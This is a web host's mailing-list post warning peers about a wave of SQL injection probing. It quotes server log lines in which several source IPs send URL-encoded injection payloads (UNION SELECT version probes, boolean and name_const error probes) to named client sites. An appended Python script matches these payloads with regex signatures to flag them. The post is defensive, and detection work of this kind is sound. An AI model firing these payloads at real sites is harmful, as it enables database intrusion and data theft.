Hey HT web hosts out there,

Due to recent hacking attempts against our servers, I have installed an IP Tracker that tracks and blocks any aggressive activity. Starting late last week we've found a growing number of IP numbers that appear to be attempting SQL Injection attacks. I've pasted a few snippets from our logs, below.

Anyone else seeing this kind of activity on their servers?

Every time I block an IP number they move to another IP number. The list of IPs hitting us is growing, and moving across multiple hosts.

So far, I've contacted four different server hosts about the traffic coming from their servers. By far the most "infected" appears to be the Unified Layer family of hosting companies, which includes HostGator Mexico, webhostbox Bigrock India, and a number of others. Additional sources of the attacks are Hetzner.com from Germany; Ozkula from Turkey; and ColoCrossing from Buffalo, NY. I'm sure more will be added as the days go on.

Stay safe.

Mik

94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A
94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1
94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x

37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1
37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x

192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing
192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1
192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1
192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x

--
---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
http://MontagueWebWorks.com
Powered by ROCKETFUSION
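Added example, not part of the original message and not the poster's own code: a Python script that flags these probes by what the request contains rather than by source address, so a move to a new IP does not evade it. The sample lines are constructed (documentation-range addresses, payloads modelled on the snippets above) and assume the five-field layout of IP, time, site, path and query; the signature names are made up for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in the post's layout: IP, time, site, path, query.
SAMPLE_LOG = """\
203.0.113.7 13:38:59 example.com /z term=0%20AND%201=1
203.0.113.7 13:39:01 example.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
198.51.100.9 08:14:38 example.org /z term=Licensing%20AND%201=1
198.51.100.9 08:14:40 example.org /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)
192.0.2.44 09:00:00 example.org /z term=Licensing
"""

# Patterns taken from the probes quoted in the post, matched after URL-decoding.
SIGNATURES = {
    "boolean_test": re.compile(r"\b(?:and|or)\s+1\s*=\s*1\b", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "version_probe": re.compile(r"unhex\(hex\(version\(\)\)\)", re.I),
    "name_const": re.compile(r"name_const\s*\(", re.I),
    "convert_int": re.compile(r"convert\s*\(\s*int\s*,", re.I),
}
CHAR_LIST = re.compile(r"\bchar\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)

def decode_char_calls(text):
    """Return the strings spelled out by CHAR(n,n,...) calls in a decoded query."""
    return ["".join(chr(int(n)) for n in m.split(",")) for m in CHAR_LIST.findall(text)]

def classify(line):
    """Parse one log line into (ip, site, signature names, marker strings)."""
    parts = line.split(None, 4)
    if len(parts) != 5:          # not in the expected five-field layout
        return None
    ip, _time, site, _path, query = parts
    decoded = unquote(query)     # %2b stays '+', %20 becomes a space
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
    return ip, site, hits, decode_char_calls(decoded)

def summarize(log_text):
    """Group flagged requests by source IP: sites probed, signatures, markers."""
    report = defaultdict(lambda: {"sites": set(), "signatures": set(), "markers": set()})
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed is None or not parsed[2]:
            continue             # malformed line or no signature matched
        ip, site, hits, markers = parsed
        report[ip]["sites"].add(site)
        report[ip]["signatures"].update(hits)
        report[ip]["markers"].update(markers)
    return dict(report)
```

The same signature set or decoded marker string showing up under different source addresses is a sign of one tool rotating through hosts.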